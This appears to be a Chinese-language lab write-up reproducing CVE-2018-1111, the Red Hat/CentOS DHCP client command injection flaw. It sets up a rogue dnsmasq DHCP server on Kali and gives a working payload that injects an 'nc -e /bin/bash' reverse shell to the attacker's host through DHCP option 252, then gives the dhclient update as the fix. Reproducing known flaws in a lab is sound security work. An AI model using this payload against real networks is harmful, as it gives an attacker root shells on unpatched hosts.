DHCP命令執行_CVE-2018-1111漏洞復現shell
1、漏洞描述centos
在Red Hat Enterprise Linux多個版本的DHCP客戶端軟件包所包含的NetworkManager集成腳本中發現了命令注入漏洞,攻擊者能夠經過本地網絡上的惡意DHCP服務器或者使用惡意的虛假DHCP響應來利用此漏洞進行攻擊,一旦攻擊成功,則能夠在配置了DHCP的NetworkManager的系統上以root權限執行任意命令。瀏覽器
2、漏洞影響版本bash
Red hat 6.x、7.x服務器
Centos 6.x、7.x網絡
3、漏洞復現環境搭建測試
測試環境:攻擊機:kali 目標機(靶機):centos7url
3.kali(攻擊機)搭建dhcp服務centos7
3.1先在kali下設置網絡(配置ip和網關)spa
3.2在當前目錄新建一個dnsmasq.conf文件,寫入如下內容進行配置:
bind-interfaces interface=eth0 except-interface=lo dhcp-range=192.168.2.20,192.168.2.30,12h #dhcp-range:表示要分配給客戶機的ip地址範圍和租約時間 dhcp-option=3,192.168.2.11 #dhcp-option 表示指定給DHCP客戶端的選項信息,3:表示設置網關地址選項 dhcp-option=6,192.168.2.11 #6:表示設置DNS服務器地址選項 log-queries log-facility=/var/log/dnsmasq.log #表示日誌記錄器
4.漏洞利用payload
dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.2.11 8888 #"
252:表示爲DHCP客戶端提供了一個用於配置其代理設置的url, wpad-proxy-url
payload 中涉及到的 option 252 是私人使用保留部分的一部分, 爲 dhcp 服務器使用 252,而後在他們的瀏覽器中寫入與 dhcp 服務器交談的能力,並要求代碼 252 從該選項列出的 URL 中獲取關於網絡上代理設置的信息
5.kali開啓監聽
6.centos(靶機)重啓網絡服務,kali接收到反彈shell
4、漏洞防護
更新dhcp
yum -y update dhclient